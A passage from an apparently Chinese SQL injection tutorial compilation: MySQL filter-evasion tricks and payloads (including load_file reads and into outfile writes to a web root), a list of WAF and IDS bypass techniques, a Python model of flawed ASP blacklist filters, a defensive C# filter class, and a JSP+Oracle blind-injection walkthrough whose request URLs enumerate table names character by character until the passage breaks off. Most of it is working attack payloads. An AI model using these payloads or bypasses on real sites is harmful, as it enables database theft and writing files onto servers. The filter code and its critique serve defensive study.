true+true: 2

floor(pi()): 3

ceil(pi()): 4

floor(version()): 5

ceil(version()): 6

ceil(pi()+pi()): 7

floor(version()+pi()): 8

floor(pi()*pi()): 9

ceil(pi()*pi()): 10

concat(true,true): 11

ceil(pi()*pi())+true: 11

ceil(pi()+pi()+version()): 12

floor(pi()*pi()+pi()): 13

ceil(pi()*pi()+pi()): 14

ceil(pi()*pi()+version()): 15

floor(pi()*version()): 16

ceil(pi()*version()): 17

ceil(pi()*version())+true: 18

floor((pi()+pi())*pi()): 19

ceil((pi()+pi())*pi()): 20

ceil(ceil(pi())*version()): 21

concat(true+true,true): 21

ceil(pi()*ceil(pi()+pi())): 22

ceil((pi()+ceil(pi()))*pi()): 23

ceil(pi())*ceil(version()): 24

floor(pi()*(version()+pi())): 25

floor(version()*version()): 26

ceil(version()*version()): 27

ceil(pi()*pi()*pi()-pi()): 28

floor(pi()*pi()*floor(pi())): 29

ceil(pi()*pi()*floor(pi())): 30

concat(floor(pi()),false): 30

floor(pi()*pi()*pi()): 31

ceil(pi()*pi()*pi()): 32

ceil(pi()*pi()*pi())+true: 33

ceil(pow(pi(),pi())-pi()): 34

ceil(pi()*pi()*pi()+pi()): 35

floor(pow(pi(),pi())): 36

@@new: 0

@@log_bin: 1

!pi(): 0

!!pi(): 1

true-~true: 3

log(-cos(pi())): 0

-cos(pi()): 1

coercibility(user()): 3

coercibility(now()): 4

minute(now())

hour(now())

day(now())

week(now())

month(now())

year(now())

quarter(now())

year(@@timestamp)

crc32(true)

Extract substrings

substr('abc',1,1) = 'a'

substr('abc' from 1 for 1) = 'a'

substring('abc',1,1) = 'a'

substring('abc' from 1 for 1) = 'a'

mid('abc',1,1) = 'a'

mid('abc' from 1 for 1) = 'a'

lpad('abc',1,space(1)) = 'a'

rpad('abc',1,space(1)) = 'a'

left('abc',1) = 'a'

reverse(right(reverse('abc'),1)) = 'a'

insert(insert('abc',1,0,space(0)),2,222,space(0)) = 'a'

space(0) = trim(version()from(version()))

Search substrings

locate('a','abc')

position('a','abc')

position('a' IN 'abc')

instr('abc','a')

substring_index('ab','b',1)

Cut substrings

length(trim(leading 'a' FROM 'abc'))

length(replace('abc', 'a', ''))

Compare strings

strcmp('a','a')

mod('a','a')

find_in_set('a','a')

field('a','a')

count(concat('a','a'))

String length

length()

bit_length()

char_length()

octet_length()

bit_count()

String case

ucase

lcase

lower

upper

password('a') != password('A')

old_password('a') != old_password('A')

md5('a') != md5('A')

sha('a') != sha('A')

aes_encrypt('a') != aes_encrypt('A')

des_encrypt('a') != des_encrypt('A')

Keyword filter

Connected keyword filtering

(0)union(select(table_name),column_name,...

0/**/union/*!50000select*/table_name`foo`/**/...

0%a0union%a0select%09group_concat(table_name)....

0'union all select all`table_name`foo from`information_schema`. `tables`

OR, AND

'||1='1

'&&1='1

'='

'-'

OR, AND, UNION

' and (select pass from users limit 1)='secret

OR, AND, UNION, LIMIT

' and (select pass from users where id =1)='a

OR, AND, UNION, LIMIT, WHERE

' and (select pass from users group by id having id = 1)='a

OR, AND, UNION, LIMIT, WHERE, GROUP

' and length((select pass from users having substr(pass,1,1)='a'))

OR, AND, UNION, LIMIT, WHERE, GROUP, HAVING

' and (select substr(group_concat(pass),1,1) from users)='a

' and substr((select max(pass) from users),1,1)='a

' and substr((select max(replace(pass,'lastpw','')) from users),1,1)='a

OR, AND, UNION, LIMIT, WHERE, GROUP, HAVING, SELECT

' and substr(load_file('file'),locate('DocumentRoot',(load_file('file')))+length('DocumentRoot'),10)='a

'='' into outfile '/var/www/dump.txt

OR, AND, UNION, LIMIT, WHERE, GROUP, HAVING, SELECT, FILE

' procedure analyse()#

'-if(name='Admin',1,0)#

'-if(if(name='Admin',1,0),if(substr(pass,1,1)='a',1,0),0)#

Control flow

case 'a' when 'a' then 1 [else 0] end

case when 'a'='a' then 1 [else 0] end

if('a'='a',1,0)

ifnull(nullif('a','a'),1)

If you have any other useful tricks I forgot to list here please leave a comment.

Part 6: Several ways to bypass anti-injection

1. Encoding

URL encoding or ASCII encoding: for example or 1=1 becomes %6f%72%20%31%3d%31, and Test can be written as CHAR(84)+CHAR(101)+CHAR(115)+CHAR(116).

2. Whitespace

Two spaces instead of one, a tab instead of a space, or no spaces at all, e.g.

or swords ='swords: because MSSQL is lenient about whitespace, the space between or and swords can be removed without affecting the query.

3. String comparisons instead of the classic test

Use a string comparison in place of the classic or 1=1 check, e.g. or swords =swords; this is the trick currently being discussed online.

4. The N type-conversion prefix

A good idea: besides getting around restrictions to some degree, it has other uses as well. For example or swords = N'swords': the capital N tells MSSQL Server to treat the string as nvarchar. It only performs a type conversion and does not change the injected statement, but it evades signature-based pattern-matching IDS.

5. Splitting strings with +

Of debatable effectiveness, but a method nonetheless: or swords ='sw' + 'ords'; EXEC('IN' + 'SERT INTO ...')

6. LIKE

Why did nobody think of this before? or swords LIKE 'sw%' easily gets around restrictions on = and >.

7. IN

Same idea as LIKE: or swords IN ('swords')

8. BETWEEN

or swords BETWEEN 'rw' AND 'tw'

9. > or <

or swords > 'sw'

or swords < 'tw'

or 1<3

...

10. Comments

/**/ in place of spaces: UNION /**/ Select /**/user,pwd from tbluser

/**/ splitting a keyword: U/**/ NION /**/ SE/**/ LECT /**/user,pwd from tbluser (note that MySQL treats a comment as a token separator, so a keyword split this way does not parse there)

11. HEX, which most IDS cannot detect

0x730079007300610064006D0069006E00 = hex(sysadmin)

0x640062005F006F0077006E0065007200 = hex(db_owner)

(These are UTF-16LE encodings, i.e. SQL Server nvarchar.)

12. Case changes

select can be written SelEct

union can be written UnIoN

13. Combining encodings

Common ones: BASE64, ASC, SQL, HEX and URL encoding

14. Relay tools

The 刺猬 relay tool can be used to bypass filters.

15. Padding with special characters

These characters are interpreted as whitespace, so this works like the whitespace method; it is mainly used against third-party firewall software.

16. Changing the attack vector

If a GET request really cannot get through, change the attack vector:

POST injection, sub-sites, neighbouring sites on the same host, and so on. If you have any questions feel free to contact me on QQ 814360954; I am happy to exchange techniques.
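The ASP filters in Part 3 and the tricks in Part 6 are two sides of one thing, so here is an added Python model, written for this page and not taken from any of the programs it discusses, that rebuilds the three Part 3 filters (raw QUERY_STRING scan, decoded-parameter scan with and without LCase) from the word list they share and feeds them the constructed requests below. The last case models the Part 2 cookie injection under the assumption, not stated on the page, that the target reads the parameter with Request("showid"), which in classic ASP falls through QueryString, Form and then Cookies.

```python
import urllib.parse

# The word list from the first ASP filter in Part 3 (SQL_injdata), '|' being its separator.
SQL_INJDATA = (":|;|>|<|--|sp_|xp_|\\|dir|cmd|^|(|)|+|$|'|copy|format|and|exec|insert|"
               "select|delete|update|count|*|%|chr|mid|master|truncate|char|declare")
BLACKLIST = SQL_INJDATA.split("|")


def blacklist_hits(value, lowercase=True):
    """Substring search exactly as Instr() does it; returns the words that matched."""
    s = value.lower() if lowercase else value
    return [w for w in BLACKLIST if w in s]


def filter_raw_querystring(query_string):
    """Method 1: scans the raw, still percent-encoded QUERY_STRING."""
    return not blacklist_hits(query_string)


def filter_parameters(query_string, form_body, lowercase=True):
    """Methods 2 and 3: scan every decoded value of Request.QueryString and
    Request.Form. Method 2 forgot LCase(); lowercase=False models that."""
    for encoded in (query_string, form_body):
        for values in urllib.parse.parse_qs(encoded, keep_blank_values=True).values():
            if any(blacklist_hits(v, lowercase) for v in values):
                return False
    return True


def asp_request(name, query_string, form_body, cookie_header):
    """ASSUMED target behaviour: classic ASP Request(name) with no collection
    given looks in QueryString, then Form, then Cookies. The filters above
    never look at the third source."""
    for encoded in (query_string, form_body):
        values = urllib.parse.parse_qs(encoded, keep_blank_values=True).get(name)
        if values:
            return values[0]
    for part in cookie_header.split(";"):
        key, _, value = part.strip().partition("=")
        if key == name:
            return urllib.parse.unquote(value)
    return ""


# Constructed requests (query string, form body, Cookie header) against a page like pro_show.asp
REQUESTS = {
    # blacklisted word in the clear: every variant catches it
    "plain and":  ("showid=17 and 1=1", "", ""),
    # upper case beats only the filter that skipped LCase() (Part 6, item 12)
    "upper case": ("showid=17+AND+1%3D1", "", ""),
    # 'or' and '=' are simply not on the list (Part 6, item 3)
    "or swords":  ("showid=17%20or%20swords=swords", "", ""),
    # the parameter travels in a cookie, which no filter inspects (Part 2)
    "cookie":     ("", "", "showid=17 and 1=1; ASPSESSIONID=abc"),
}


def evaluate(name):
    """True means the request is allowed through by that filter."""
    query, form, cookie = REQUESTS[name]
    return {
        "raw": filter_raw_querystring(query),
        "params_lcase": filter_parameters(query, form, lowercase=True),
        "params_nocase": filter_parameters(query, form, lowercase=False),
        "value_seen_by_page": asp_request("showid", query, form, cookie),
    }


if __name__ == "__main__":
    for name in REQUESTS:
        print(name, evaluate(name))
    print("brand=nike allowed by raw filter:", filter_raw_querystring("brand=nike"))
```

Method 1 rejects the "or swords" request only because "%" is on its list, which also means it rejects every legitimate query that carries an encoded space, and "brand=nike" fails on the "and" inside "brand": substring blacklists miss real payloads and block real users at the same time.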

Part 7: Keeping script injection out of the database (web security)

Website security matters, so a site needs basic defences against attacks such as script attacks, cross-domain attacks and database injection. Below is a utility class I use to keep SQL script injection out of database statements.

using System;
using System.Collections.Generic;
using System.Text;

namespace NZS.Common
{
    public class Filter
    {
        /// <summary>
        /// Checks whether the input contains dangerous characters (SQL injection check)
        /// </summary>
        /// <param name="contents">the content to check</param>
        /// <returns>true or false</returns>
        public static bool HasSqlKeywords(string contents)
        {
            bool ReturnValue = false;
            if (contents.Length > 0)
            {
                string LowerStr = contents.ToLower();
                // Matches database keywords and some special characters, such as the single quote
                string RxStr = @"(\sand\s)|(\slike\s)|(select\s)|(insert\s)|(delete\s)|(update\s[\s\S].*\sset)|(create\s)|(\stable)|(<[iframe.|/iframe.|script.|/script])|(')|(\sexec)|(declare)|(\struncate)|(\smaster)|(\sbackup)|(\smid)|(\scount)|(cast)|(%)|(\sadd\s)|(\salter\s)|(\sdrop\s)|(\sfrom\s)|(\struncate\s)|(\sxp_cmdshell\s)";
                System.Text.RegularExpressions.Regex Rx = new System.Text.RegularExpressions.Regex(RxStr);
                ReturnValue = Rx.IsMatch(LowerStr, 0);
            }
            return ReturnValue;
        }

        /// <summary>
        /// Strips injection fragments from a string that will be placed in a SQL statement
        /// </summary>
        /// <param name="str">the input string</param>
        /// <returns>the filtered string</returns>
        public static string SqlFilter(string str)
        {
            str = str.Replace("'", "''");       // single quote -> two single quotes
            str = str.Replace(";", "；");       // half-width semicolon -> full-width, blocks stacked statements
            str = str.Replace("(", "（");       // half-width parentheses -> full-width
            str = str.Replace(")", "）");
            /////////////// These should be regular-expression replacements so that case variants are caught too ////////////////////
            str = str.Replace("Exec", "");      // strip the stored-procedure execution keyword
            str = str.Replace("Execute", "");
            str = str.Replace("xp_", "x p_");   // break system / extended stored-procedure prefixes
            str = str.Replace("sp_", "s p_");
            str = str.Replace("0x", "0 x");     // break hex literals
            return str;
        }
    }
}

Part 8: JSP+ORACLE injection method v1.0 (script security)

Hello everyone, we are pt007 and solaris7, QQ:7491805/564935; experts are welcome to get in touch :)

First, thanks to 华仔 and his friend Hotkey for developing the cnsafersi injection tool; without it this article would not exist. The article analyses and organises the data captured from cnsafersi's traffic. It was written in a hurry, and corrections from fellow practitioners are welcome. I also hope someone will develop a more powerful JSP injection tool: cnsafersi currently only supports select, and a new tool could add insert/delete/update/backup/upload/command execution, using NBSI's feature set as a reference. Reference: "How to develop CnSaferSI".

First, the tool used in this article, the JSP injection tool cnsafersi by 华仔 and his friend Hotkey; a detailed usage tutorial will follow:

Using the AD table from the figure above as the example, the JSP+ORACLE injection process is as follows:

1. Determine the injection type (numeric or string)

Numeric versus string probes (someone may want to refine these into two separate groups). These are the tool's generic probes; user>char(0) and str() are SQL Server syntax, which is why only the CHR() form further down gets a normal page out of Oracle:

www.test.net/index_kaoyan_view.jsp?id=117 And user>char(0)

www.test.net/index_kaoyan_view.jsp?id=117 And user

www.test.net/index_kaoyan_view.jsp?id=117' And user>char(0) And '1'='1

www.test.net/index_kaoyan_view.jsp?id=117' And user

www.test.net/index_kaoyan_view.jsp?id=117' And user>char(0) And '%25'='

www.test.net/index_kaoyan_view.jsp?id=117' And user

www.test.net/index_kaoyan_view.jsp?id=117) And user>char(0) And 1 in(1

www.test.net/index_kaoyan_view.jsp?id=117) And user

www.test.net/index_kaoyan_view.jsp?id=117') And user>char(0) And (' ')=('

www.test.net/index_kaoyan_view.jsp?id=117') And user

www.test.net/index_kaoyan_view.jsp?id=117 And str(98)>str(97)

www.test.net/index_kaoyan_view.jsp?id=117 And str(98)

www.test.net/index_kaoyan_view.jsp?id=117' And str(98)>str(97) And '1'='1

www.test.net/index_kaoyan_view.jsp?id=117' And str(98)

www.test.net/index_kaoyan_view.jsp?id=117' And str(98)>str(97) And '%25'='

www.test.net/index_kaoyan_view.jsp?id=117' And user

www.test.net/index_kaoyan_view.jsp?id=117' And str(98)

www.test.net/index_kaoyan_view.jsp?id=117) And str(98)>str(97) And 1 in(1

www.test.net/index_kaoyan_view.jsp?id=117) And str(98)

www.test.net/index_kaoyan_view.jsp?id=117') And str(98)>str(97) And (' ')=('

www.test.net/index_kaoyan_view.jsp?id=117') And str(98)

Requests that returned a normal page:

www.test.net/index_kaoyan_view.jsp?id=117 And USER>CHR(0)

www.test.net/index_kaoyan_view.jsp?id=117 And USER

2. Guess the number of tables and their names

The table count has three digits (the length of COUNT(*) as a string is 3):

www.test.net/index_kaoyan_view.jsp?id=117 And 0<=nvl(length((SELECT COUNT (*) FROM USER_TABLES)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 1>=nvl(length((SELECT COUNT (*) FROM USER_TABLES)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 2<=nvl(length((SELECT COUNT (*) FROM USER_TABLES)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 4>=nvl(length((SELECT COUNT (*) FROM USER_TABLES)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 3=nvl(length((SELECT COUNT (*) FROM USER_TABLES)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And UNISTR(1)>UNISTR(0)

Next, the table count is guessed digit by digit: each "N>ascii(substr(...,pos,1))" request narrows the range, and "N=ascii(...)" confirms the digit.

First digit of the count: 1

www.test.net/index_kaoyan_view.jsp?id=117 And 52=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 52>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 49=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),1,1))

Second digit of the count: 3

www.test.net/index_kaoyan_view.jsp?id=117 And 49=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 77=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 77>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 70=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 70>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 67=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 67>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 65=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 65>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 109=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 109>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 102=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 102>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 99=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 99>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 97=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 97>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 53=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 53>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 51=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

Third digit of the count: 1

www.test.net/index_kaoyan_view.jsp?id=117 And 51=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 77=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 77>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 70=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 70>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 67=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 67>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 65=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 65>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 109=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 109>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 102=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 102>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 99=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 99>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 97=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 97>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 54=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 54>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 52=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 52>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 49=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

There are 131 tables in total (see the figure above).

Guessing the table names:

Length of the first table name: 2

www.test.net/index_kaoyan_view.jsp?id=117 And 0<=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 1>=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 2<=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 4>=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 3=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 3>nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 2=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

First character of the first table name: A

www.test.net/index_kaoyan_view.jsp?id=117 And 65=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1),1,1))

Second character of the first table name (AD): D

www.test.net/index_kaoyan_view.jsp?id=117 And 65=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 78=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 78>ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 71=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 71>ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 68=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1),2,1))

Length of the second table name (ADER): 4

www.test.net/index_kaoyan_view.jsp?id=117 And 0<=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 1>=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 2<=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 4>=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 3=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 3>nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 4=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

First character of the second table name (ADER): A

www.test.net/index_kaoyan_view.jsp?id=117 And 65=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),1,1))

Second character of the second table name (ADER): D

www.test.net/index_kaoyan_view.jsp?id=117 And 65=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 78=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 78>ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 71=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 71>ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 68=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),2,1))

Third character of the second table name (ADER): E

www.test.net/index_kaoyan_view.jsp?id=117 And 68=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 79=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 79>ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),3,1))

